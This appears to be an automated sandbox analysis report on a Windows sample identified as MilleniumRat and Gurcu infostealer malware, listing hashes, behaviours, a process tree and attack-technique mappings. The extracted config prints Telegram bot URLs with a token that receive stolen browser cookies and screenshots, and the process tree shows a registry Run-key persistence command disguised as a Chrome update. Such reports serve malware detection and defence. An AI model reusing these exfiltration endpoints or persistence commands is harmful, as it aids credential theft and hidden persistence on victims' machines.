Analysis
-
max time kernel
19s -
max time network
28s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-12-2024 02:42
Static task
static1
Behavioral task
behavioral1
Sample
scanjector.exe
Resource
win10v2004-20241007-en
General
-
Target
scanjector.exe
-
Size
17.4MB
-
MD5
00a089806c6d881d0716d38ca3f26f1f
-
SHA1
14e6f87e781dfef16566cc0c85e7a1c2ce578bad
-
SHA256
0c374469d4e9f2f0036e48f61c821e23416e41111792fa35e215886f3c0d5c46
-
SHA512
5440ee4137d2415657dce424b98a15b44d07bf7784ec2fb07a7328bfe2a5a76a4d8cada61f9669ee4477e69d2e5ef752cd147c84f9523868c6690d82c9c3192d
-
SSDEEP
393216:f/hnALfhy7zZYOY3iWkvdCsJjQ2SHjNKED9UQr:3pAjhyHZ+33o820rUQr
Malware Config
Extracted
gurcu
https://api.telegram.org/bot8121099632:AAEGRQywapM__xBl2iPOZXa0Zc5KRb_4SgU/sendDocument?chat_id=-4770872927&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb
https://api.telegram.org/bot8121099632:AAEGRQywapM__xBl2iPOZXa0Zc5KRb_4SgU/sendMessage?chat_id=-4770872927
https://api.telegram.org/bot8121099632:AAEGRQywapM__xBl2iPOZXa0Zc5KRb_4SgU/sendDocument?chat_id=-4770872927&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Gurcu family
-
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Milleniumrat family
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation scanjector.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation system32.dll.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Update.exe -
Executes dropped EXE 3 IoCs
pid Process 4076 system32.dll.exe 2812 main.exe 1108 Update.exe -
Loads dropped DLL 2 IoCs
pid Process 4076 system32.dll.exe 1108 Update.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 17 raw.githubusercontent.com 18 raw.githubusercontent.com 21 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3596 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 808 timeout.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2588 reg.exe -
Suspicious behavior: EnumeratesProcesses 47 IoCs
pid Process 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 4076 system32.dll.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe 1108 Update.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4076 system32.dll.exe Token: SeDebugPrivilege 3596 tasklist.exe Token: SeDebugPrivilege 1108 Update.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1108 Update.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 3912 wrote to memory of 4076 3912 scanjector.exe 83 PID 3912 wrote to memory of 4076 3912 scanjector.exe 83 PID 3912 wrote to memory of 2812 3912 scanjector.exe 84 PID 3912 wrote to memory of 2812 3912 scanjector.exe 84 PID 4076 wrote to memory of 4736 4076 system32.dll.exe 86 PID 4076 wrote to memory of 4736 4076 system32.dll.exe 86 PID 4736 wrote to memory of 4552 4736 cmd.exe 88 PID 4736 wrote to memory of 4552 4736 cmd.exe 88 PID 4736 wrote to memory of 3596 4736 cmd.exe 89 PID 4736 wrote to memory of 3596 4736 cmd.exe 89 PID 4736 wrote to memory of 1532 4736 cmd.exe 90 PID 4736 wrote to memory of 1532 4736 cmd.exe 90 PID 4736 wrote to memory of 808 4736 cmd.exe 92 PID 4736 wrote to memory of 808 4736 cmd.exe 92 PID 4736 wrote to memory of 1108 4736 cmd.exe 93 PID 4736 wrote to memory of 1108 4736 cmd.exe 93 PID 1108 wrote to memory of 1356 1108 Update.exe 97 PID 1108 wrote to memory of 1356 1108 Update.exe 97 PID 1356 wrote to memory of 2588 1356 cmd.exe 99 PID 1356 wrote to memory of 2588 1356 cmd.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\scanjector.exe"C:\Users\Admin\AppData\Local\Temp\scanjector.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Users\Admin\AppData\Roaming\system32.dll.exe"C:\Users\Admin\AppData\Roaming\system32.dll.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpB0D1.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpB0D1.tmp.bat3⤵
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Windows\system32\chcp.comchcp 650014⤵PID:4552
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 4076"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3596
-
-
C:\Windows\system32\find.exefind ":"4⤵PID:1532
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
PID:808
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f5⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f6⤵
- Adds Run key to start application
- Modifies registry key
PID:2588
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\main.exe"C:\Users\Admin\AppData\Roaming\main.exe"2⤵
- Executes dropped EXE
PID:2812
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
286B
MD503ad15d01348dfeee262109a8a7ac0d8
SHA1fe36eea3a52cbbecbf17d93fb0eb934e65f67355
SHA256e82b442ee1b471cc26a839b3385f41a256ba438062a92dc603638faf5e2533f8
SHA512978fb0ff32c8e7619685b813ee53ddf59a8e2d2285534c98a962b835117f7b2f4580bd0f43247aeb574da61227ba8e9a18a62eaf7aadb733430e3d6b1d9909d6
-
Filesize
11.8MB
MD5b9f6832045d1ebb340a01e97900bf7ed
SHA17b0b6aa8fd7cc55048443f4499da14b4fbeed466
SHA25649b140137989de837736c23b3b095063c8fa30fd22bfe12b4282326ca431cd12
SHA51231acdb392db706d8d188c1aba5452783a7482109024afd6dcf23e2eba00872b0ed9d86e128a5393a479e89cc657f4b9bf6bbbda76e6b360b426be58b8f53a912
-
Filesize
5.7MB
MD5587df5dee51ff841ea947719352dc993
SHA116595bb74e53f842f53677ef12d37e170b06a807
SHA256b8cec521e0f51803ed248b7e8ee6415339c34e92499265dd32aab678cb5e51c4
SHA5126c0ee1cd89c211daa6e4a2bf80c1e746c2879f93ab88891935a332af0763c373aed5e38ae511a190758765e5e146081d80bac10655b7bffe9d7231d0b6d959f1